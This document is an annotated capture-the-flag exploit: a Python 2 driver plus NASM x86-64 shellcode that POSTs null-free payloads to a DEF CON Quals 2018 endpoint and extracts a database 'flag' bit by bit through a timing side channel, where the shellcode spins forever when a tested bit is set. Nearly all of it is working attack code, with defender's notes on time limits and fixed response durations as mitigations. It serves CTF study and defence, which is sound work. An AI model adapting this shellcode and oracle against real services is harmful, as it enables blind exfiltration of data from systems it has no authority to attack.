# Driver for template.asm: recovers bytes of a remote reply one bit at a
# time through a timing side channel.  Python 2 (xrange, print statement).
#
# For each byte index and each of its 8 bits the script renders the asm
# template with {index}/{bitmask}, assembles it with nasm into a flat
# binary, POSTs the bytes to the endpoint, and classifies the bit by how
# long the request took: the payload spins forever when the bit is set, so
# a response slower than 3 s is read as "1".
#
# Defender's note: the only signal is wall-clock response time.  The channel
# disappears if executed code gets a hard time limit shorter than the
# threshold, or if responses are padded to a fixed duration.
import requests, time, os

ss = "X"                                # bytes recovered so far; "X" stands in for index 0
for index in xrange(len(ss), 200):      # resume after ss; at most 200 bytes
    s = ""                              # bits of the current byte, appended LSB first
    for i in xrange(8):
        # Render the template for this (index, bit) pair.
        data = open("template.asm", "rb").read()
        data = data.replace("{bitmask}", str(1 << i))
        data = data.replace("{index}", str(index))
        open("test.asm", "wb").write(data)
        # nasm without -f emits a flat binary; with no -o the output is "test".
        os.system("d:\\temp\\nasm-2.11.08\\nasm.exe test.asm")
        #os.system("d:\\temp\\nasm-2.11.08\\ndisasm.exe -b 64 test")
        shell = open("test", "rb").read()
        # The assembled payload must not contain 0x00 (presumably the
        # receiving side truncates at NUL); the template is written to
        # avoid zero bytes, and this guard catches a rendering that breaks that.
        if "\x00" in shell:
            print "ZERO IN SHELL"
            exit()
        data = {"shell": shell}
        start = time.time()
        res = requests.post("http://b9d6d408.quals2018.oooverflow.io/cgi-bin/index.php", data=data)
        spent = time.time() - start
        # Timing oracle: > 3 s means the payload hung, i.e. the bit was set.
        # A single network stall is misread as "1"; there is no retry or
        # repeated measurement.
        if spent > 3:
            s += "1"
        else:
            s += "0"
        print s
    # Bits were appended LSB first, so reverse before parsing as binary.
    ss += chr(int(s[::-1], 2))
    print repr(ss)
;-----------------------------------------------------------------------
; template.asm -- timing-oracle payload (NASM, flat binary, x86-64)
;
; Rendered by the companion Python driver, which substitutes {index} and
; {bitmask} before assembling and refuses to send output containing a
; 0x00 byte.  That constraint explains the indirect constant loading
; below (xor + mov al/dl, shl, dec instead of plain immediates).
;
; Flow: write a fixed packet to fd 4, read up to 255 bytes of reply into
; a scratch buffer, then test one bit of one reply byte.  Bit set -> spin
; forever (the driver's request times out); bit clear -> return.  The
; driver turns that time difference into one bit of the reply.
;
; Defender's note: the signal exists only because the executing service
; lets the payload run past the driver's 3 s threshold.  A hard CPU/wall
; time limit on executed code, well below that threshold, or a fixed
; response duration removes the channel.
;
; Assumptions not visible here (inferred -- confirm against the target):
;   - Linux x86-64 syscall numbering (rax=1 write, rax=0 read);
;   - fd 4 is an already-open socket to the database the query targets;
;   - the code is loaded at a 256-byte-aligned address, so rewriting only
;     the low byte of an in-code address (mov al, data / mov al, {index})
;     yields a pointer into the intended block;
;   - the 256 bytes after the block containing data are writable scratch.
; Clobbers: rax, rsi, rdi, rdx, rcx/r11 (syscall), flags.  The read()
; result in rax is never checked; a short read leaves stale scratch bytes.
;-----------------------------------------------------------------------
bits 64
        jmp     tramp1                  ; jmp/call/pop to learn our own runtime address
tramp2:
        jmp     tramp3
tramp1:
        call    tramp2                  ; pushes the address of tramp3 as the return address
tramp3:
        pop     rsi                     ; rsi = runtime address of tramp3
        mov     rax, rsi
        mov     al, data                ; low byte := offset of data (see alignment assumption)
        mov     rsi, rax                ; rsi = &data
        push    rsi                     ; keep &data for later
foo2:
        xor     rax, rax
        mov     byte [rsi+1], al        ; data bytes 1..3 are assembled as 1 to avoid 0x00
        mov     byte [rsi+2], al        ; in the output; zero them in place before sending
        mov     byte [rsi+3], al
        xor     rax, rax
        mov     al, 4
        mov     rdi, rax                ; rdi = 4 (fd)
        xor     rax, rax
        mov     al, dataend-data
        mov     rdx, rax                ; rdx = length of the data block
        xor     rax, rax
        mov     al, 1                   ; rax = 1 (write)
        syscall                         ; write(4, data, dataend-data)
        xor     rdx, rdx
        mov     dl, 0x80
        shl     rdx, 1                  ; rdx = 0x100 without a 0x00 byte in the encoding
        pop     rax                     ; rax = &data
        mov     al, 1
        dec     rax                     ; low byte := 0 without a zero immediate
        add     rax, rdx                ; rax = (&data & ~0xff) + 0x100: scratch buffer
        push    rax                     ; keep the buffer address
        mov     rsi, rax                ; rsi = buffer
        xor     rax, rax
        mov     al, 4
        mov     rdi, rax                ; rdi = 4 (fd)
        xor     rax, rax
        mov     al, 0xff
        mov     rdx, rax                ; rdx = 255 (max bytes to read)
        xor     rax, rax                ; rax = 0 (read)
        syscall                         ; read(4, buffer, 255); byte count in rax, unchecked
        pop     rsi                     ; rsi = buffer
        mov     rax, rsi
        mov     al, {index}             ; low byte := {index} from the driver
        mov     rsi, rax                ; rsi = &buffer[{index}] (buffer assumed 256-aligned)
        mov     al, byte [rsi]          ; the reply byte under test
        and     al, {bitmask}           ; isolate one bit (1 << i); sets ZF
        jnz     foo                     ; bit set -> hang (slow response)
        retn                            ; bit clear -> return promptly
foo:
        jmp     foo                     ; infinite loop: the "1" signal
;mov rbp, 0
data:
        ; Presumably a MySQL-style packet: 3-byte length (19) + sequence id,
        ; then command byte 3 and the query text -- verify against the target.
        ; The 1s in the header are zeroed at runtime (see foo2).  A declared
        ; length of 19 covers the command byte plus 18 query characters, so
        ; the trailing space lies outside the declared payload.
        db      19,1,1,1, 3, "SELECT * FROM flag "
dataend: